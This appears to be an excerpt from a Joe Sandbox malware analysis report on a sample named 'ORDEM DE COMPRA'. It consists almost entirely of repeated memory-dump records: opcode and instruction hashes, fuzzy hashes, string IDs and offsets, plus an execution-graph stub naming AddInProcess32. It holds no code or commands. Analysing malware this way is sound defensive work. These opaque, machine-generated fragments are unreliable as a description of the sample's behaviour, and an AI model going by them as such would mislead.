                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$6q$7q$7q$8q$8q$9q$9q
                • API String ID: 0-1071263328
                • Opcode ID: e6bb3627dccab1f4d94646fd4ca13ddadb3825472acc821464c176a55e8056fc
                • Instruction ID: a9cd7183a82753999b4022549538396701e692be8c5367bc292579a598345b97
                • Opcode Fuzzy Hash: e6bb3627dccab1f4d94646fd4ca13ddadb3825472acc821464c176a55e8056fc
                • Instruction Fuzzy Hash: BAB2E23062E3855FE35E8BB844A36D9BBE0EF52364F1540BED44ECB193D99D080BCA59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$7q$7q$8q$8q$9q$9q
                • API String ID: 0-3688058974
                • Opcode ID: d68cc374e9b3e48f1b00701c7f60c3bfa82fb884a9c4fc38bfecd99bb16ff864
                • Instruction ID: 2a63305f46a72b0099064311f7b47066542219c56fd22ce85b7ba24b66dc5182
                • Opcode Fuzzy Hash: d68cc374e9b3e48f1b00701c7f60c3bfa82fb884a9c4fc38bfecd99bb16ff864
                • Instruction Fuzzy Hash: 62A2E23062D3855FE31E9BB844A36D9BBE0EF52364F1540BED44ECB193D99D080BCA59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • String ID:
                • API String ID:
                • Opcode ID: 4af8ed48efbae9561917eb4281f6b19d8dd73782e568c01a5eb98fe0cb730845
                • Instruction ID: 17e21889fee6066aa2a9a493ccc417f9b36dd11e6a2b1c26a1036e770fbab355
                • Opcode Fuzzy Hash: 4af8ed48efbae9561917eb4281f6b19d8dd73782e568c01a5eb98fe0cb730845
                • Instruction Fuzzy Hash: 5E916F61A0E68A5FE786EBB884B62A97BE1EF56310F1401FAC08DD71D7CD6C6C42C351
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d0a02374d23b4a1594a02d2f03b62fe998515678b9fe7e5ce2298a12725ba3f9
                • Instruction ID: 2168d157742259379574c788d757edbaf60722a579b3a6c45936a1adc1283e1e
                • Opcode Fuzzy Hash: d0a02374d23b4a1594a02d2f03b62fe998515678b9fe7e5ce2298a12725ba3f9
                • Instruction Fuzzy Hash: 5C714531618F094FEB58DF1CD8969B573E0EF96311B14027EE549C32A2DE69B846C7C2
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75aa6c2a46d8de244873232ff6f435ddea60dd792f32ed399823af618a467a44
                • Instruction ID: dc0d4072275c9e2a89553e4be52c81d080f0c498af504e4a2b79c8614c95304c
                • Opcode Fuzzy Hash: 75aa6c2a46d8de244873232ff6f435ddea60dd792f32ed399823af618a467a44
                • Instruction Fuzzy Hash: BF712431B0EA4A0FE399DB2888A557577E2EF87314B0442BED58EC3293DD6CE8038351
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 271cc15d566f154be82703f95a1c3bdc10507789e90ae8cafb64cdf864a7bd2a
                • Instruction ID: 87274fdd9f622aac13f3c9389f3367f7534bf52d323981901167b9bacc5e33e6
                • Opcode Fuzzy Hash: 271cc15d566f154be82703f95a1c3bdc10507789e90ae8cafb64cdf864a7bd2a
                • Instruction Fuzzy Hash: 7061D63170DA094FE7C8EB1CD499A7973D1EF9A324B0401BED44EC72A2DE69EC428780
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 348adcf413c4a85a158b5dcf51faf0da588d89c70763173942f9c05bdf8be63b
                • Instruction ID: bda07063b3c6c8ef1796a0fc297db0da27d5f017e87564ae29279c734e0a4f1e
                • Opcode Fuzzy Hash: 348adcf413c4a85a158b5dcf51faf0da588d89c70763173942f9c05bdf8be63b
                • Instruction Fuzzy Hash: 5971153070E6495FDB49AB2884A59B57BE0EF46320F1401FDD04DC72A7CA2DBC46C791
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ae2f1f49b5faf16ba82dfdcc430b320e31431dd9fecb4790928bf0369a4bb94
                • Instruction ID: 1081245d1e6cc6ff707684d15c809b6f45e353392501ba9f220497156f6c6332
                • Opcode Fuzzy Hash: 1ae2f1f49b5faf16ba82dfdcc430b320e31431dd9fecb4790928bf0369a4bb94
                • Instruction Fuzzy Hash: AC714F307189099FEBA5EB28C8A9B7937E1FF59710F1400B9D44DC72A6DE68EC058781
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 140f3c6ae65478c53f35c0f7c79d19978e43704b01b7e935477d1c1edb1eaa75
                • Instruction ID: 919224c8d55be29076ae7cf72d3d0860ff52d04334099bdacadb0b1a0d2e3c27
                • Opcode Fuzzy Hash: 140f3c6ae65478c53f35c0f7c79d19978e43704b01b7e935477d1c1edb1eaa75
                • Instruction Fuzzy Hash: 13519727B0D6615BD761ABFCB8F11E57BA0DF4237570801B7D288CB193DD68744A83A1
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: de0903e65e8faf6d7391e7dc9b0c8147d73a98aa58adf4afb5acd5ded623dbe4
                • Instruction ID: 39d91909bf72ec970b343e2eab03916559e2057b43beee8410644da0a2db5c53
                • Opcode Fuzzy Hash: de0903e65e8faf6d7391e7dc9b0c8147d73a98aa58adf4afb5acd5ded623dbe4
                • Instruction Fuzzy Hash: 96512821B1CE064BE7A8A75CA4A65B5B3C1EB9A360F14427FE94DC32D6DD28FC4252C1
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43e1469156618262898c2961817670ca8eeda406c06c34b2b2d7f86d785c13c7
                • Instruction ID: 7fbd6d3e4d7a690675db5ffb44870a8543cd718506b336defffb4b9fc350d2e4
                • Opcode Fuzzy Hash: 43e1469156618262898c2961817670ca8eeda406c06c34b2b2d7f86d785c13c7
                • Instruction Fuzzy Hash: 46615921B1EE8A0FE7E59B7C58A53BA77D1EF46214F0841BED54DC3293CE6CA8018381
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7cccc753ed75590d63b84264916bdfd8b8363e06060606c3bb766b93e8bd0075
                • Instruction ID: 54bb02c14d1fe208ec10ec1bdd862efe9a467b0e461b775f0a15cad3b0666a8a
                • Opcode Fuzzy Hash: 7cccc753ed75590d63b84264916bdfd8b8363e06060606c3bb766b93e8bd0075
                • Instruction Fuzzy Hash: 4551F962B0E7C50FD7969B6C98A51603FE2DF5B22470941FBD489CB1D3DD5C6C068361
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b538da5a5b89ba8aa3e06adb2dc2b3a7a1687bb262a905eb7b46732da89b65da
                • Instruction ID: 816e7920e68840929399ba0c5cf23f673ce36e05dce5b13616f71b63358b8d4b
                • Opcode Fuzzy Hash: b538da5a5b89ba8aa3e06adb2dc2b3a7a1687bb262a905eb7b46732da89b65da
                • Instruction Fuzzy Hash: 4A51CA71B1DB1C4F9B589B5CE8460B977E1FB9A721F10023FE58AC3211DA21B85386C2
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: af8155d98f6fcb4e5ada557824a9395a46d2f63fb8b2cc6924f1a8ccbcaacbd8
                • Instruction ID: b7da02f12043fcb32945f1107241dc74e7bd5d70a5e21cce77f4f5dd9b16c1fb
                • Opcode Fuzzy Hash: af8155d98f6fcb4e5ada557824a9395a46d2f63fb8b2cc6924f1a8ccbcaacbd8
                • Instruction Fuzzy Hash: A7510A2170D9490AE794B26CA8A52FA77D5EF86331F04467FE28DC3183ED6DA84252D0
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7cb7d70259300401e958e7e389a1b9d4edd3ade6f15cd79dd4943a8f3dc7ff4
                • Instruction ID: 6879c15c704ac86ee5323a0cef2d33ee15197b5609d4109b1410ed72da507ebc
                • Opcode Fuzzy Hash: d7cb7d70259300401e958e7e389a1b9d4edd3ade6f15cd79dd4943a8f3dc7ff4
                • Instruction Fuzzy Hash: 9361A422E0F6C25FE7A6977848B51657FE0AF1326470D01FBC598CB0D3ED5D680A9362
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04689f15d4c73b9ee5172d3b2f46ee07e1ae32eca96ca5a974a21f8535bbe442
                • Instruction ID: 5eb18ba4186a8a4f44c30f504dd5e9df6d4046a40f96eacccd4274068dd0cdce
                • Opcode Fuzzy Hash: 04689f15d4c73b9ee5172d3b2f46ee07e1ae32eca96ca5a974a21f8535bbe442
                • Instruction Fuzzy Hash: C241233170CA1A1FE764AB1CA8A55B677D0EB56329B1400BAD549C3192ED6EBC8383C0
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 822f110f82a3f2a94bca07a13a346fa176adea557f0af9b2c7d798bacc254678
                • Instruction ID: ecbe070621ed55a13ea854655a750cff41d0aa07d50dd431d4f755338594705f
                • Opcode Fuzzy Hash: 822f110f82a3f2a94bca07a13a346fa176adea557f0af9b2c7d798bacc254678
                • Instruction Fuzzy Hash: 5E41F521F18E4A4FEBA49B1D94E46B2B7D1EF95310B0441BBD54EC3A92DD6CE84287C0
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c6ec4a5971dad2605b3bb8b813256494e999d0bef11a89076a0f16ff91f83b97
                • Instruction ID: 33a88cbafa52b50863810381acc6d402b7de707ed0d4893780587cab472e18d2
                • Opcode Fuzzy Hash: c6ec4a5971dad2605b3bb8b813256494e999d0bef11a89076a0f16ff91f83b97
                • Instruction Fuzzy Hash: 1951FE31719A0A4FEBA4DF1894905A6F3E2FF9A310B0405BFD54AC3691DE28FC06DB40
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed30d146872a52de348c7f851dbba42ab8965a0f8daae83d05cdf5b68e18475c
                • Instruction ID: dc1f62215956c6cc710aff93046812d81fc1b0f0f9da7d3d06b550e60199cb0e
                • Opcode Fuzzy Hash: ed30d146872a52de348c7f851dbba42ab8965a0f8daae83d05cdf5b68e18475c
                • Instruction Fuzzy Hash: 9651A471609A8A8FDFC8CF18C8A4A6537A1FF59308B1406ADE46DC73D2CB75E812C711
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b83ec1b33f854c0b0036454653a316e972f77a080086e46cb68248441539657a
                • Instruction ID: c7cfb9b398849048a9a2e51425e582f42f27b30e1da64fe9cb04ce2a80d589f1
                • Opcode Fuzzy Hash: b83ec1b33f854c0b0036454653a316e972f77a080086e46cb68248441539657a
                • Instruction Fuzzy Hash: 8641957171A6188FDB88EB18D4919B977E1EF95310F5001ADE44EC7293DE28FC42CB91
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 777c8f8cd583edc1801580f00c22a4bc187ffc295a64da997c5eb1abe233cb4d
                • Instruction ID: 8529819c4824d59be3ffe961f5a78324335e081df9973a09418396efca069267
                • Opcode Fuzzy Hash: 777c8f8cd583edc1801580f00c22a4bc187ffc295a64da997c5eb1abe233cb4d
                • Instruction Fuzzy Hash: B041D221A0F6D20FE7A797B858B55A57FE1DF47220B0901FAC989CB193C94D5C4BC3A1
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f0fcba66219c3b8e8f193f33977a682a5771f61ab185fab14ad2a924a1adb8e
                • Instruction ID: 9c83499d4fe4eafd7e5d38798565412e1cc8446f2f75ba6b0fdda12ebc052dbf
                • Opcode Fuzzy Hash: 3f0fcba66219c3b8e8f193f33977a682a5771f61ab185fab14ad2a924a1adb8e
                • Instruction Fuzzy Hash: 11318531714C094FEBE8EB9C94A8AB573D1EF9931175401BAD90DC73A5DD68DC8287C0
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5949e8cf2c6b6a5751d885f757415160785b91a8b984a80a17b0a6a4fb5780cf
                • Instruction ID: 03821744eb7df4bc9b8c9b41daf0c60725866f1bf7020cd0252cbd1db480f1ae
                • Opcode Fuzzy Hash: 5949e8cf2c6b6a5751d885f757415160785b91a8b984a80a17b0a6a4fb5780cf
                • Instruction Fuzzy Hash: BC319353B0E6A51BD762ABFCA8F11E67BA0DF5232470D01B3D1C8CB197EC6874468391
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b7725a8c48a656e5b3a8f2f790ab873b9a2237d7546ede719f6c30f46ed8756
                • Instruction ID: 668cd9d2c85895f044b1910e9ecdb2ceef7823e0e7332ec552f3c156b3d2e9d0
                • Opcode Fuzzy Hash: 4b7725a8c48a656e5b3a8f2f790ab873b9a2237d7546ede719f6c30f46ed8756
                • Instruction Fuzzy Hash: B331D321B099090FEEE4EB5C58E4AB563D2EF9A391B4441B7E64DC3296DD2ADC029380
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6c06c658875ee78395da5c5315719317a19e09baa2e055b5aa342c61e0f17a
                • Instruction ID: 262419b382d557824eaa98cf2d2415b28d894145ad6bf731ff83b4c2ca57ea16
                • Opcode Fuzzy Hash: bf6c06c658875ee78395da5c5315719317a19e09baa2e055b5aa342c61e0f17a
                • Instruction Fuzzy Hash: B231FB21B1DF860FD3AAE7A898A54B577E1EF5521070441BFD04EC35D3DD68BC0A8391
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a78151d3850f37e8802df73c98ac1686d8d6b0886bbb30ea10f5be8eea166ace
                • Instruction ID: fd8771f9e2935c6b3a39c0758fce5254ff70cdecf4cc4dd0388a2a2136036e02
                • Opcode Fuzzy Hash: a78151d3850f37e8802df73c98ac1686d8d6b0886bbb30ea10f5be8eea166ace
                • Instruction Fuzzy Hash: 6F31AC52B0E6D10BD766A7BCA8B11E93FA0DF4322470D01F3D5D8CB197EC68684A83A1
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c89d46b47e88fae5ced6bf12013f67ef7a7711284109c3e5b33e5ffd5d340ef7
                • Instruction ID: 371b672287d04a33bdbc59ee7d7c85e3c6d6f45259b8f3fe0fe419f26b0c8198
                • Opcode Fuzzy Hash: c89d46b47e88fae5ced6bf12013f67ef7a7711284109c3e5b33e5ffd5d340ef7
                • Instruction Fuzzy Hash: 3C21C932B1D9190FF66C961CB8975B533D1DF96270708017BE98AC31A7EC8ABC4352C5
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4183ad282660a12358f6771704181a94289589daa7987996960b1bafc159d0f4
                • Instruction ID: f36bc745d770415a35333267c9c68fe01917970d0b3d148be62edcf30250a0e8
                • Opcode Fuzzy Hash: 4183ad282660a12358f6771704181a94289589daa7987996960b1bafc159d0f4
                • Instruction Fuzzy Hash: 8E31A132F09D484FEF819E58A8A91ED37D1EFDE314B19017BD54CE73A1DE64A8018782
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69e461766634032a4934052e2e20aa960457295b7f6ae18a7bc977c5a90ad0f6
                • Instruction ID: b0037901587b109b3e0c3b997a76d2632eac67aa6afc27bea50b1f38abf28ca8
                • Opcode Fuzzy Hash: 69e461766634032a4934052e2e20aa960457295b7f6ae18a7bc977c5a90ad0f6
                • Instruction Fuzzy Hash: 29213953F0ED8A0FEBE9A75C14B52B417D1EF9A256B0402B7D81EC71C6DD5CA8068381
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23bcd91cbee880a35846197ad6ea6f3e7c52c63bcec89106fa02fbffb6b50549
                • Instruction ID: 0ed7c7ccaa9ed6ce8b6cb366388a5051bbab65bd71ae2527f6d406cc4fe237dd
                • Opcode Fuzzy Hash: 23bcd91cbee880a35846197ad6ea6f3e7c52c63bcec89106fa02fbffb6b50549
                • Instruction Fuzzy Hash: 27212232A1C9890FDB5CAA9898A69F937D4EF65710F04106EF84FD3283DD39B8068281
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02d254842b868b482b4de69655dac0a1f1d3a8b8dce10c33b9c06ce45dfc3f48
                • Instruction ID: b116011500d21f043924b23d633b8b114067d6538f18b677f9ded39535a87ebd
                • Opcode Fuzzy Hash: 02d254842b868b482b4de69655dac0a1f1d3a8b8dce10c33b9c06ce45dfc3f48
                • Instruction Fuzzy Hash: 3821D232B1CA410FE75CA69CA8A65BAB7D0EF99324F04507FF08ED3197DD34B8464282
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a511a022f2120dc429e8f7a6b8c4fed490a6202cb35ad8dd848a4b00eb9a7c1
                • Instruction ID: f36b74d7949b34d65f0d4d84b39a65c724a5ce2ea9f127f5e9e7f2c358f305fb
                • Opcode Fuzzy Hash: 7a511a022f2120dc429e8f7a6b8c4fed490a6202cb35ad8dd848a4b00eb9a7c1
                • Instruction Fuzzy Hash: 2B31F431719B088FD784EB1CD095AAAB7E1EF9A354F00067AE549C3260CE74E8418BC2
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e729f83bc90070a6361a370c3772747a5fa8bcff48674e1ae7506d064e9b793
                • Instruction ID: cebc752f0b68d7edb9c0211817cb6b1880b1f6bf5b52b40941ab5fc7e0a82c9a
                • Opcode Fuzzy Hash: 9e729f83bc90070a6361a370c3772747a5fa8bcff48674e1ae7506d064e9b793
                • Instruction Fuzzy Hash: E731933071AE0A5FDBA4EB5DC0E5E62B3E1FF6A310B500579D64EC3252CA29F881DB40
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ceb7c2a8c05f49150f57a0d969e2087b141416d32c0ddc665f985ac70508d4e5
                • Instruction ID: 10c62143e028b6418a665993f4c195d3934e872ff98c3b3f7adc6861170882ad
                • Opcode Fuzzy Hash: ceb7c2a8c05f49150f57a0d969e2087b141416d32c0ddc665f985ac70508d4e5
                • Instruction Fuzzy Hash: 4D21EC3270D7955FD752D76CE8B11DA7BE0EF82361F08017BD544CB193DE6894058392
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6111718c488bec145b2da3ebd7434013fedd3efdb7b7de260bc796666175d24e
                • Instruction ID: b80287b93ced282375fa5a067699d026f1df59326162cd0b6343df9925f87fe7
                • Opcode Fuzzy Hash: 6111718c488bec145b2da3ebd7434013fedd3efdb7b7de260bc796666175d24e
                • Instruction Fuzzy Hash: 2521AF30719D094FDA9CEB2DD899A6573E1FFA9310B1002ADE04EC36A2DE65FC458740
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3672d3497ee10011a26e2dc9bdc766b233b971691939ff1066eb0c53eca87ef
                • Instruction ID: f8598ebf892c4c2aa25d51ae91c3d31a1bc9c474b1906820f8b647db86f62969

                Execution Graph

                Execution Coverage: 13.3%
                Dynamic/Decrypted Code Coverage: 100%
                Signature Coverage: 5.2%
                Total number of Nodes: 230
                Total number of Limit Nodes: 21

                Control-flow Graph
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
